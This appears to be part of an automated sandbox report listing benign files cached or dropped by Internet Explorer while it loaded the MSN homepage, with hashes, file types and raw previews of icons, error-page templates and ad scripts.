                                                    Preview: .PNG........IHDR................a....pHYs..........+......IDATx....P..?E....U..E..|......|...M.XD.`4YD...{.\6....s..0.;....?..&.../. ......$.|Y....UU)gj...]..;x..(.."..$I.(.\.E.......4....y.....c...m.m.P...Fc...e.0.TUE....V.5..8..4..i.8.}.C0M.Y..w^G..t.e.l..0.h.6.|.Q...Q..i~.|...._...'..Q...".....IEND.B`.
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\BBaK3KR[1].png
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                    Category:downloaded
                                                    Size (bytes):573
                                                    Entropy (8bit):7.349094488394042
                                                    Encrypted:false
                                                    SSDEEP:12:6v/7NIfYm1XWu6mDEAepnuXY21k6slLKoDzhxkACyqwboOMIN:mvm1j6WYnuXDJILKG3kL1jNIN
                                                    MD5:67175AA26DA94F2B5E69C696361616A0
                                                    SHA1:82D56692E6808BC268030AD3865054F2E7EC0E9C
                                                    SHA-256:B2A8CB2FF49286CF5601FF666FB18CB5D8A582727F419A2477DC1AB93CD1F8CA
                                                    SHA-512:95598CB67AB8C163601314CEB28BD4B41E376E7289553545CC2296DEF1391609ABF97BB21817B82E1129FC5C5CABB0B6464C4B21E32C8E87FF58E75AEAA24F05
                                                    Malicious:false
                                                    Reputation:unknown
                                                    IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBaK3KR.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                    Preview: .PNG........IHDR................a....pHYs..........+......IDATx.c.1.....F.r..H3#.~Y)>..h#.Gk..).....^|a.........?..b..2/"@.........{.<`X...XZSE.!.W.!*P...}?...q.$.....jg....0...ex..+......=....u.`q.!`.@..........1+.a..3`>......'.3tT:2.?.......1F`g.4.k.1r.....8..'....4.a8.6..N5.. ^p.R....[Tg.te...5......>.@f..(.a..V.F..r..[.O'e.*.........gPT.....C...Z.....p...!>..b.........6...7_G..Ja..t..L..E.h...,<....Dw.3.+..8U....x...CM.A..*'..}~.e.{......B..z....1V...%ix .[..........8pT.B..@~.9.d3H..W.. .n...2..G.D.J......-..f,!..@...S.u..$...$....k.....IEND.B`.
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\NewErrorPageTemplate[1]
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):1612
                                                    Entropy (8bit):4.869554560514657
                                                    Encrypted:false
                                                    SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                                                    MD5:DFEABDE84792228093A5A270352395B6
                                                    SHA1:E41258C9576721025926326F76063C2305586F76
                                                    SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                                                    SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: .body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\auction[1].htm
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                    Category:downloaded
                                                    Size (bytes):19124
                                                    Entropy (8bit):5.789426097155166
                                                    Encrypted:false
                                                    SSDEEP:384:EPqLndpisrIn03DmeswEn/EaruVfr9eheQfupVQbb6SNDBftBbyk6:1LLh65Bb/DhWv
                                                    MD5:10431A45558254A455346758EE253615
                                                    SHA1:AE4E4DE11860F5B427BF817683CABEDDF68454A8
                                                    SHA-256:7212DFFB2C9A5DF639505E8E2449CB0080478D20D438E51BC50C6A7926009086
                                                    SHA-512:7F6BBB62FB403E733FC2474F1EAA58BB9C474D6BB09F91BFBE279DCB65F6DA2AC04B901B5D1448E6C13963551CAABEAF4BBAF22E1DFEA71A9C4EBAB73B0DB54C
                                                    Malicious:false
                                                    Reputation:unknown
                                                    IE Cache URL:https://srtb.msn.com/auction?a=de-ch&b=46c7587a53c54af4a0067d4dfabd949f&c=MSN&d=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp&e=HP&f=0&g=homepage&h=&j=0&k=0&l=&m=0&n=infopane%7C3%2C11%2C15&o=&p=init&q=&r=&s=1&t=&u=0&v=0&x=&w=&_=1627408543008
                                                    Preview: ..<script id="sam-metadata" type="text/html" data-json="{&quot;optout&quot;:{&quot;msaOptOut&quot;:false,&quot;browserOptOut&quot;:false},&quot;taboola&quot;:{&quot;sessionId&quot;:&quot;v2_3c4a268411abf1d1a0e7ebdfdb90ffab_41ff6cec-272c-4c64-9d5d-8337b27f33e6-tuct7f94f96_1627376150_1627376150_CIi3jgYQr4c_GPzfjtusxOitrwEgASgBMCs4stANQNCIEEje2NkDUP___________wFYAGAAaKKcqr2pwqnJjgFwAA&quot;},&quot;tbsessionid&quot;:&quot;v2_3c4a268411abf1d1a0e7ebdfdb90ffab_41ff6cec-272c-4c64-9d5d-8337b27f33e6-tuct7f94f96_1627376150_1627376150_CIi3jgYQr4c_GPzfjtusxOitrwEgASgBMCs4stANQNCIEEje2NkDUP___________wFYAGAAaKKcqr2pwqnJjgFwAA&quot;,&quot;pageViewId&quot;:&quot;46c7587a53c54af4a0067d4dfabd949f&quot;,&quot;RequestLevelBeaconUrls&quot;:[]}">..</script>..<li class="triptych serversidenativead hasimage " data-json="{&quot;tvb&quot;:[],&quot;trb&quot;:[],&quot;tjb&quot;:[],&quot;p&quot;:&quot;taboola&quot;,&quot;e&quot;:true}" data-provider="taboola" data-ad-region="infopane" data-ad-index="3" data-viewab
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\down[1]
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):748
                                                    Entropy (8bit):7.249606135668305
                                                    Encrypted:false
                                                    SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                                                    MD5:C4F558C4C8B56858F15C09037CD6625A
                                                    SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                                                    SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                                                    SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: .PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\errorPageStrings[1]
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4720
                                                    Entropy (8bit):5.164796203267696
                                                    Encrypted:false
                                                    SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                                                    MD5:D65EC06F21C379C87040B83CC1ABAC6B
                                                    SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                                                    SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                                                    SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\http___cdn.taboola.com_libtrc_static_thumbnails_b67e798f3c7b07a0a881efd1f7c9156c[1].jpg
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
                                                    Category:downloaded
                                                    Size (bytes):13731
                                                    Entropy (8bit):7.960051800422934
                                                    Encrypted:false
                                                    SSDEEP:384:6Am3SnL1Heu41/qhFSk2DxpPK4YU17YLd1EHoqZjw7pH90:DBJ+u4ZqhFSrDfG/5yHTZ87H0
                                                    MD5:07BC7985F35BAC6241AECB614503657F
                                                    SHA1:6ADBE2C2965050B9FC5F939AA9718E29F9E8B371
                                                    SHA-256:686282907903D39C3949B9B25EED38D136E63EEED9B83FE0E1B9F089E565B474
                                                    SHA-512:8F8A244AB80F7E3B6BD98EE5B39DE0A55A90A22DFDF1EDDEE85CB341C64885BD009CA1D54AFB345C17B7A804110C3347229B62124468CED461FBC628182B9D11
                                                    Malicious:false
                                                    Reputation:unknown
                                                    IE Cache URL:https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Fb67e798f3c7b07a0a881efd1f7c9156c.jpg
                                                    Preview: ......JFIF...........................................%......%!(!.!(!;/))/;E:7:ESJJSici................................%......%!(!.!(!;/))/;E:7:ESJJSici.........7...."..........4...................................................................<6..w...9.nn...M.u.=.G...H.....e..$=-Pq......E.a.&..j[S....VI\^..q1...4r./KA.j..="....o=.t.j.).4|.c1.f..C.K.|.q.-.{..1.<....h...C.$"....Q......=...,.Z..\)..z......'..\a.]...RY.B..".x.LviK.y.....o..7..zz.^.@1.......|....|[.B.=.69E..!Z..lVW...F...#L.J.....?....s....8........0...l......b?<...u#.j..M....x...0...w.Y($..m.c..n.N.F..!D.9b.......{=..e.G7<..i..zvzC...dm.(zz.....$.Z.|5..............OD.a/.5........j...:y....j.D.l.Q..h.Y..+K..1..)..p.....(rE._).b/.m..&u......TW..oS..n.=...nP!..hKW.......1KG+...&\..%.7..c..!..}.=.a.J...$W[.?4...W)!...._..}..M1CW*.al.m......N{L.C....+s.8E?.(u.e..[.h..h..D..P/u...._.z%k.}....'K..F..u.lg.#....x..I.... ..Z.h............?.[...q.b.-.'5.]........f.R.LD.j..H.?_..IF......,.
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\medianet[1].htm
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:HTML document, ASCII text, with very long lines
                                                    Category:downloaded
                                                    Size (bytes):399102
                                                    Entropy (8bit):5.486882722049114
                                                    Encrypted:false
                                                    SSDEEP:6144:z6RkYxYZvGgDnmWynGo8IM03VCu1bQE0Hw9PIv:9ZvfDmnGo8IMGxVIUPIv
                                                    MD5:1B53140A8A87F6301EF46C038DE3313B
                                                    SHA1:7916BB6B8865F82750308B98EA4E38F34A706D5C
                                                    SHA-256:E01563A060DE003527E725B052EAEED9336855D01FF5B3292EB250DEA33EE907
                                                    SHA-512:C980D24CB960613AE4E4A5B2307A212A5E7A74DDDB95567A644003534F0EBB764E9953BCEBB695AD0DA463E532ADC4B6A42E3F3A692932C1894033E6243FB0DD
                                                    Malicious:false
                                                    Reputation:unknown
                                                    IE Cache URL:https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
                                                    Preview: <html>.<head></head>.<body style="margin: 0px; padding: 0px; background-color: transparent;">.<script language="javascript" type="text/javascript">window.mnjs=window.mnjs||{},window.mnjs.ERP=window.mnjs.ERP||function(){"use strict";for(var l="",s="",c="",f={},u=encodeURIComponent(navigator.userAgent),g=[],e=0;e<3;e++)g[e]=[];function d(e){void 0===e.logLevel&&(e={logLevel:3,errorVal:e}),3<=e.logLevel&&g[e.logLevel-1].push(e)}function n(){var e=0;for(a=0;a<3;a++)e+=g[a].length;if(0!==e){for(var n,r=new Image,o=f.lurl||"https://lg3-a.akamaihd.net/nerrping.php",t="",i=0,a=2;0<=a;a--){for(e=g[a].length,0;0<e;){if(n=1===a?g[a][0]:{logLevel:g[a][0].logLevel,errorVal:{name:g[a][0].errorVal.name,type:l,svr:s,servname:c,errId:g[a][0].errId,message:g[a][0].errorVal.message,line:g[a][0].errorVal.lineNumber,description:g[a][0].errorVal.description,stack:g[a][0].errorVal.stack}},n=n,!((n="object"!=typeof JSON||"function"!=typeof JSON.stringify?"JSON IS NOT SUPPORTED":JSON.stringify(n)
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\medianet[2].htm
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:HTML document, ASCII text, with very long lines
                                                    Category:downloaded
                                                    Size (bytes):399102
                                                    Entropy (8bit):5.48684578741143
                                                    Encrypted:false
                                                    SSDEEP:6144:z6RkYxYZvGgDnmWynGo8IM03VCu1brE0Hw9PIv:9ZvfDmnGo8IMGxV9UPIv
                                                    MD5:6ECD98374223F81DA804C8B690A88C70
                                                    SHA1:C6AC9920DB8F2582C5F646350F24D8545C6C3D03
                                                    SHA-256:FE5745F9F7C4A9296E2D07958EBA60717794F4487A03ACF4914F67E4D9990FA9
                                                    SHA-512:20818470C312BC44D54E7E95507DFF8991FCB33FFE2597CF54922FF66BB28F10EA71C08DA7AE52D4CF35A34C23CC76B794A4D4606F2D4218C1580947CD646323
                                                    Malicious:false
                                                    Reputation:unknown
                                                    IE Cache URL:https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
                                                    Preview: <html>.<head></head>.<body style="margin: 0px; padding: 0px; background-color: transparent;">.<script language="javascript" type="text/javascript">window.mnjs=window.mnjs||{},window.mnjs.ERP=window.mnjs.ERP||function(){"use strict";for(var l="",s="",c="",f={},u=encodeURIComponent(navigator.userAgent),g=[],e=0;e<3;e++)g[e]=[];function d(e){void 0===e.logLevel&&(e={logLevel:3,errorVal:e}),3<=e.logLevel&&g[e.logLevel-1].push(e)}function n(){var e=0;for(a=0;a<3;a++)e+=g[a].length;if(0!==e){for(var n,r=new Image,o=f.lurl||"https://lg3-a.akamaihd.net/nerrping.php",t="",i=0,a=2;0<=a;a--){for(e=g[a].length,0;0<e;){if(n=1===a?g[a][0]:{logLevel:g[a][0].logLevel,errorVal:{name:g[a][0].errorVal.name,type:l,svr:s,servname:c,errId:g[a][0].errId,message:g[a][0].errorVal.message,line:g[a][0].errorVal.lineNumber,description:g[a][0].errorVal.description,stack:g[a][0].errorVal.stack}},n=n,!((n="object"!=typeof JSON||"function"!=typeof JSON.stringify?"JSON IS NOT SUPPORTED":JSON.stringify(n)
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\ot_logo[1].png
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:PNG image data, 496 x 136, 8-bit/color RGBA, non-interlaced
                                                    Category:downloaded
                                                    Size (bytes):13077
                                                    Entropy (8bit):7.917259483236238
                                                    Encrypted:false
                                                    SSDEEP:384:saDuLzB7lqCUfQIMrWiHUInHuAuYceTCP5Zqx0dY6n8AlS/Y:saq5snXIHrZTC/qx0d5TE/Y
                                                    MD5:F16C8EFBBF422ED7135FCD73ADC4DF82
                                                    SHA1:79D9F3C7D3F43EEFC059F0A18642A09C195EB135
                                                    SHA-256:61E7A7943F7444E87B2AF6295044B34292A537A23DD3D9436886E3A2CCF620CA
                                                    SHA-512:866B2B1E1AA76574755F7A97A706CE18F6151ECCBDCC9E432CE407666E251821B347C271C58B2EF06804847AEDDA93DCA8FAD95C7E7BC91E351430B13321CE0A
                                                    Malicious:false
                                                    Reputation:unknown
                                                    IE Cache URL:https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/consent/55a804ab-e5c6-4b97-9319-86263d365d28/6f0cca92-2dda-4588-a757-0e009f333603/logos/static/ot_logo.png
                                                    Preview: .PNG........IHDR...................2.IDATx..]...U..#(....vQD@..=......HS....n..7J.....k....H..3w7.... ..#=@....$;s.3.....o~.dw.9......)...u}r..m.3...l...^...rS-...~=Mu.............u.o.......Q6.w....vd.A../*..2..v..j....;...e......z..k........p.2.|i.^}7w.O\@D.V.]...L..71.}[..%...rS.kyx..i.'..6O.........".....I..o.KY.`..y....!".'.'"".IKJ.f.zh...P....^..Fy..i.........l.....g1....*..~o.u........8.8...^].[W.m.%.......F;GD.N.ND4:.n..==.2.]....z..}?.$..8.8..!.....V(..o..'|.v.......()....nC...*....^lrs....=.)J...OM.V.G,GD.N.ND.....^r..T...z..~...y.Ey.<.mAlGD.N.ND..'.....A..^^.}..*.N83...zv..V.M.G/m9e...d}.G..z......k.i......q.}...[6...zmYW^I.]..m..K.GD.N.ND...i.P..f(&.&..71..@z......J?`.RO.pa..R.8QZ....A...~5...vH..E.F.1.rIa.. .7a....}VOs.fi...].6..(w.|.[..}?@lH.....O..({...%e......x.b&.]3ia..8V....T..K<.;k..+.........g..[f.....'.%.2...s=...Q.G/........(,u.....p$...y j..IC.o.H.....).0...D..DDDAd..W_...3..KD..]h.R.SQS.m....D..DDD.r
                                                    C:\Users\user\AppData\Local\Temp\~DF062FDCDB4F94074D.TMP
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):39609
                                                    Entropy (8bit):0.5663303410540426
                                                    Encrypted:false
                                                    SSDEEP:96:kBqoxKAuvScS+EWJripHJeXREJeXRgJeXRZ:kBqoxKAuqR+EWJripHWqWuW/
                                                    MD5:03A2EA00DA984AB93073062A9C15FC51
                                                    SHA1:AE06A1D2EA9DF763D429FCD620A8CD269A5228A6
                                                    SHA-256:70C4A0B1E183F78EEC943DA4987DC6AFB2E2AAF1805507A0EC421F4A7663F8BC
                                                    SHA-512:830587A5ECE3ACDC15BCA40F1DC8C001B3BF93E706BF19A2FFCC09816403E25B6F77BECB8FACD2EBDE25392A72ED8516C9C47903F16D449D1F2703A29C1E5E5E
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Temp\~DF08B878BCF33B695B.TMP
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):29745
                                                    Entropy (8bit):0.29988568795826087
                                                    Encrypted:false
                                                    SSDEEP:24:c9lLh9lLh9lIn9lIn9lRx/9lRJ9lTb9lTb9lSSU9lSSU9laAa/9laAe459laAC9t:kBqoxxJhHWSVSEabFQ2y
                                                    MD5:6429178CB5B025A84D0FC7FA11A8330D
                                                    SHA1:90E44BDBB8F6B568E03EA7B009DF0578AEF2DC40
                                                    SHA-256:5FCA2A0E7550C9E5D3A9BA96DEACD7C7F1FD5EDB2FAFCCC2BB552E3EBAA6AF48
                                                    SHA-512:49D3679013B1CE109027FA6C12731D04DD96CAD52137B47346F6B7E90E53FDAEB7F2E410DF8305938395D9A1AD8E5F9C00F29D30722FFF1E6A7D6C65B6C6A0E9
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Temp\~DF0E36D985417365CA.TMP
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):39721
                                                    Entropy (8bit):0.590261686317078
                                                    Encrypted:false
                                                    SSDEEP:96:kBqoxKAuvScS+YWN/2d7rQgHgrQgHcrQgH1:kBqoxKAuqR+YWN/2d7rQRrQZrQ+
                                                    MD5:6C74715DC07FDE6CD302EAD6E095EF67
                                                    SHA1:2E5630BFBE572430CE1CF2A335C0248424974A55
                                                    SHA-256:D9A153F1652959D3EAE58279E2C7A8EB37F3DE82C67D1D0D168155211B044DBB
                                                    SHA-512:9E06639C69F0B587F43ADA275038136A1490A8D7EC77FFED8F7D77244D30AD22922A5D17BF40F40ABFDAD0E1E9BDD69DBE0F966FCA4691A3403C1000C7323BC5
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Temp\~DF10309534F0EC25E8.TMP
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):39665
                                                    Entropy (8bit):0.5793996627443412
                                                    Encrypted:false
                                                    SSDEEP:96:kBqoxKAuvScS+BW6vYvpvyv850/8x50/8t50/8S:kBqoxKAuqR+BW6gBqECWC2Cv
                                                    MD5:CCC9F62A2613055CFD0B334074182292
                                                    SHA1:F72B065397784276FFAABF4DCE41439401FE0630
                                                    SHA-256:C339D7D04B6F0BC9536AD6F756F954B3C09331FB6CE6A5C60C1F80081B387DE4
                                                    SHA-512:72FDBB1E6F2D17511E9F43D35C168C55CD250DDCE370D13BB9DEB434EC6625CBAFDA52F4D1FD4FD6E53D7C1E9D47B26B12964ACFB93F737335A162C277C77B46
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Temp\~DF1AD755D018BCF3BC.TMP
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):39641
                                                    Entropy (8bit):0.5745890838659706
                                                    Encrypted:false
                                                    SSDEEP:48:kBqoxKAuvScS+8Wl7T6+I+iYvOOYvOqYvO7:kBqoxKAuvScS+8WRT6hf/O/q/7
                                                    MD5:EE595AA7C06409892DF018161382FB9A
                                                    SHA1:E2CC37BA8AD8A41AAC5A52D22BDF3B8F83109CBE
                                                    SHA-256:F38457EEEEFC7CB5BF828052D190C37D16ED8FFACDABF6CBB3C2FAE7DEBF8B5B
                                                    SHA-512:A842636CF12F9BAE3B0EB39B8BADB3A4ED332A52DC2DFDDFFBA64963EF8FB3C6AD517A31D808B3E1E2F5144E3C2B1C632697FD475F26DF864649C032AF9B7DEC
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Temp\~DF27CC092B48FD4DFC.TMP
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):39625
                                                    Entropy (8bit):0.5699018359238919
                                                    Encrypted:false
                                                    SSDEEP:96:kBqoxKAuvScS+XWg6TgC8dLr/q58dLr/qx8dLr/qW:kBqoxKAuqR+XWg6TgCe/q5e/qxe/qW
                                                    MD5:728DAA4790C68F08C402D358779D4B41
                                                    SHA1:3F2E30E5C2954AB69551504B86D9C1F6A1239A2F
                                                    SHA-256:2C2E35CFDCB72515FCAA3EE0A5ED2035C61A9F1D72207EEE1657CAFC28774AD5
                                                    SHA-512:FED4C8E6108395CA1E43E44F54961EC36081DD40ECEE92FCA75E1565DBAEBE09A31B491DCB76E5F3C32BC114A84DBE5088A6A0561CAF3A3E7B17325B10A74E00
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Temp\~DF33BF02FD7D3A8D8B.TMP
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):39721
                                                    Entropy (8bit):0.5895099360516713
                                                    Encrypted:false
                                                    SSDEEP:48:kBqoxKAuvScS+sWV7DqOIOaUfprnYGdx+GxIUfprnYGdx+GxEUfprnYGdx+Gx9:kBqoxKAuvScS+sWhDqxHSEGmSEGKSEGb
                                                    MD5:C647339C17E446334FF093E2BA979334
                                                    SHA1:E7CE6592345F77BF59BB7F408C1CA42C6F7C1130
                                                    SHA-256:55557AD7965E32DE8B63F2FC01D76C1A2FE2904B7C313F276BF56B688D9AB941
                                                    SHA-512:DF24064DAC31EBBDF3D33FE126D4B4E08AB22684A9AC0DD7B75206C79BEDEFFEC5DC991799762829044D33749EFA6AC7EE210511F5CE2D1A46EA7F4DC3E6EF6D
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Temp\~DF3968330B4E72C162.TMP
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):39625
                                                    Entropy (8bit):0.5714474979759108
                                                    Encrypted:false
                                                    SSDEEP:96:kBqoxKAuvScS+wWVHuVjBtw6GBtw6aBtw6L:kBqoxKAuqR+wWVHuVjb0bobR
                                                    MD5:0AFEB226C21FCB74FA9AB7D986FDE857
                                                    SHA1:EA04600A0FAA4AD75863711AF861D25D8533F744
                                                    SHA-256:2E9648A5A40E9033CD72EA7A40B55007ACF92EFED86BA046458C1B299BF14196
                                                    SHA-512:52350B3A2618A0090E8DDAD14858537B83F39665C2A01C676441C9B9B236D62BB12B071597166EC265A3F618A51628FB1F8EA62F3A9ADF7CC9247C691591FE2F
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Temp\~DF39E22DFDB3D5D5BF.TMP
                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):39633
                                                    Entropy (8bit):0.5715075239667475
                                                    Encrypted:false
                                                    SSDEEP:96:kBqoxKAuvScS+wWVHuVPI6hvlbI6hvlfI6hvlE:kBqoxKAuqR+wWVHuVPlPlDlo
                                                    MD5:5AEC143427593A3F4119B8120BE3FA90
                                                    SHA1:8BCFFB417E740584AF6CF1C47BF5FBF9F1FA36C3
                                                    SHA-256:9C6E8F6ED81478DAC451992E2AFB4C8C8DEF5B94E32121935C245393A099E300
